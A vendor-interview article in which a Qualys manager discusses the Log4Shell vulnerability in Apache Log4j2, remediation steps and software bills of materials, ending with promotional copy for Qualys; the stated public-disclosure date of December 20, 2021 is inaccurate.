A major zero-day vulnerability affecting Apache's Log4j2 library, a Java-based logging utility, was publicly published on December 20, 2021. This new vulnerability was soon given a name: Log4Shell.
CSA sat down with Steven Gan, Country Manager at Qualys - Southeast Asia, to talk more about Log4Shell and why it’s here to stay. He explained, “Log4Shell is going to be a vulnerability that young kids today if they choose to pursue a career in cybersecurity, will still be dealing with fifteen years from now.”
The Need to Stamp out Flaws Like Log4Shell
The reason is, that there are 12 million Java developers worldwide and 15 billion devices that run Java. According to Steven, Apache Log4j is one of the most used logging libraries in the world, but the exact percentage of Java applications using it is unknown.
The full scope of risk that this vulnerability presents is something we have never seen and it affects every type of organisation across all industries.
“A vulnerability such as Log4Shell is not one that any security professional could have necessarily predicted or avoided. However, it does underscore that nearly every enterprise environment contains open-source applications. Yet, organisations are still struggling with the challenges of managing out-of-date code and high-risk vulnerabilities,” he added.
Although open-source applications were the most vulnerable, vulnerabilities were also discovered in cloud workloads and containers. Hence, enterprises must continue to monitor containers for flaws like Log4Shell.
“Managing one application and its data in a cloud environment may be simple but it is nearly impossible to manage dozens of applications in multiple cloud environments with disparate management tools. Without careful planning and the right tools, companies can spend more time managing cloud infrastructure than benefiting from it,” Steven explained.
When monitoring running containers and cloud workloads for flaws such as Log4Shell, he added that organisations need to invest in a platform approach that helps orchestrate consistent security controls across a multi-cloud environment to save security teams time and increase efficiency. Due to today’s threat landscape and severe vulnerabilities such as Log4Shell coming to fruition, according to Steven, this is becoming a must-have for every organisation’s cyber arsenal.
Taking Pre-Emptive Measures
Interestingly, when Log4Shell was detected in more than 2,800 publicly facing web applications, the industry basically responded with an ‘all hands-on deck’ approach to prevent attackers from successfully breaking into their environments via the vulnerability. The threat of Log4Shell was so severe that in one instance, Steven stated that a Fortune 50 global manufacturing company’s CISO gave the directive to take all servers completely offline if they could not remediate the flaw within days.
Qualys was one of the first industry players to analyse the threat and develop effective countermeasures, including:
Within 24 hours, Qualys had published its findings and launched a Log4Shell resource centre to keep the industry updated.
Qualys released over 70 vulnerability detections and continued to release more as vendors released patches.
Qualys hosted webcasts for customers/non-customers on steps recommended for remediation.
And many more!
When asked about what organisations can do to mitigate this vulnerability or eliminate it entirely, he simply said, as with most vulnerabilities, understanding how and where the flaw will affect your business is crucial.
Confronting the Log4Shell vulnerability in your environment has seemed anything but “easy” due to its prevalence in Java applications. While Log4Shell is one of the most serious vulnerabilities ever discovered, remediating it is rapidly becoming a faster process than one might think.
“The answer? Upgrades and patches,” said Steven.
STEP 1 - Understand Your External Attack Surface: Quickly scan external attack surfaces (public-facing websites and applications) to identify any potential vulnerability by simulating the attack.
STEP 2 - Find Where You Are Vulnerable and Prioritise: A big challenge introduced by this vulnerability is detecting it. As Log4Shell may affect any Java application that uses a vulnerable version of Log4j, it is important to take a multi-layered approach using asset management, vulnerability management and container scanning tools.
STEP 3 - Remediation: Once your higher priority vulnerable applications are identified, begin their remediation processes. Different remediation methods will be required because the Log4Shell vulnerability may affect every Java-based application. Each should be based on the unique application type and function.
STEP 4 - Detect Exploits: Due to the complexity of detecting and remediating this vulnerability, organisations must continue to detect exploit attempts in real-time.
Why Organisations Need a Software Bill of Materials (SBOM)
An SBOM is similar to an ingredients list in a processed food item but it describes the components of a software package and informs businesses if they are vulnerable to supply chain attacks.
“Organisations who cannot get a holistic view of their assets and create a software bill of materials for everything in their environment are at significant risk of exploitation. This risk may begin forcing these organisations to take entire systems offline,” said Steven. “With a vulnerability like Log4Shell, the only actions organisations can take are to hunt for the vulnerability, review the criticality of their assets and understand their exposure to the internet.”
While SBOM often serves as an organisation’s first visibility into the software supply chain, it is not the entire solution. Steven mentioned how an SBOM simply provides the "list of ingredients," organisations then need to learn how to consume and analyse the data quickly.
According to him, organisations typically have an incomplete picture of assets, do not understand key risk context and leave open security gaps that cybersecurity criminals can exploit. Security teams need a way to go beyond static asset inventory or a simple “list of ingredients” to understand the security context.
Companies need to simplify their strategies and move away from siloed and disparate point solutions to succeed in today’s tumultuous threat landscape. That’s where a company like Qualys can help.
The Qualys vision is to simplify cybersecurity for everyone and give organisations one platform and one agent. Qualys Cloud Platform gives you a continuous, always-on assessment of your global IT, security and compliance posture, with 2-second visibility across all your IT assets, wherever they reside. And with automated, built-in threat prioritisation, patching and other response capabilities, it is a complete, end-to-end security solution.